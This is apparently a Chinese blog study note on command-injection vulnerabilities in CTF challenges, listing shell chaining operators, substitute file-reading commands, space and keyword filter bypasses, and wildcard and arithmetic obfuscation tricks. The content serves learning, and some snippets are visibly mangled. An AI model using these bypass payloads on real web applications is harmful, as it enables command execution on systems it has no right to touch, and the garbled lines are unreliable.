总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)

简介: >🍀1复习一下以前的内容>🍀2总结整合一下过滤方法
🏆今日学习目标:
🍀1复习一下以前的内容
🍀2总结整合一下过滤方法
✅创作者:贤鱼

请添加图片描述

🍀复习内容:

漏洞原理

==控制可执行系统命令的函数==

思路

控制函数,寻找flag,并且根据其对应过滤内容绕过过滤

实现过程

通过ls和ls /查看当前目录下以及根目录,通过cat,tac等打开flag

🍀🍀绕过过滤方法大融合

Linux中的连接符

大部分题目中都带有如下内容或者与其作用相似的,我们为了执行命令必须让下面这段代码失去作用
在这里插入图片描述
这里就需要介绍到连接符了,具体内容可以查看以往两期,这里我们重在总结:

==连接符==

cat flag.php; ls
👆执行完cat,再执行ls
cat flag.php&& ls
👆cat成功执行再执行ls
cat flag.php|| ls
👆cat执行失败执行ls
cat flag.php| ls
👆将flag的内容作为第二个命令的输入
cat flag.php 'cat love xianyu'
👆先执行单引号内内容,将结果作为命令的一部分
cat flag.php $(cat love xianyu)
👆先执行¥()内内容,将结果作为命令的一部分

查看文件的命令

==如果遇到了过滤可以相互替换==

==命令==(使用方法):
==cat== (cat flag.php)
==tac== (tac flag.php)
==more== (more flag.php)
==less== (less flag.php)
==head== (head flag.php)
==nl== (nl flag.pgp)
==od==(od -c flag.php)
==vi== (vi flag.php)
==vim== (vim flag.php)
==sort== (sort flag.php)
==uniq== (uniq flag.php)
==file== (file -f flag.pgp)
==grep== (grep flag.php)
==paste== (paste flag.php)
==xxd== (xxd flag.php)

绕过空格方式

cat flag.php
cat $IFSflag.php

catIFS1flag.php

cat${IFS}flag.php

绕过关键字

有时候会过滤掉类似flag的关键字,可以通过一下方式绕过

flag
fl'a'g==单引号==
fl"a"g==双引号==
fl\ag==反斜杠==
fl$@ag==¥@==

也可以拼接字符

a=c;c=t;d=a;ad$c==拼接完就是cat==

a=f;c=a;d=g;b=l;catIFS1abcd.php==abcd拼接出来flag==

过滤全部字符

/bin/base64
/???/????64 ????????

构造数字

echo (())==0==echo((~(())))==1==echo((~(())))((~(())))((~(())))==111==echo(((( (())))(( (())))(( (())))))
==-3==
echo (( (((( (())))(( (())))(( (())))))))
==2==

🏆结束语
==贤鱼依旧会不定期更新已有内容,并且会继续更新新的内容,还请大家继续关注支持贤鱼!!!==
请添加图片描述

目录
打赏
0
0
0
0
1
分享
相关文章
|
6月前
|
Web安全-命令执行漏洞
Web安全-命令执行漏洞
60 1
|
8月前
|
web安全之命令执行
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行。
75 4
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
40 0
记一次“上传”命令执行的绕过案例
记一次“上传”命令执行的绕过案例
126 0
Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取
Smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
332 0
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
810 0
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
1371 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等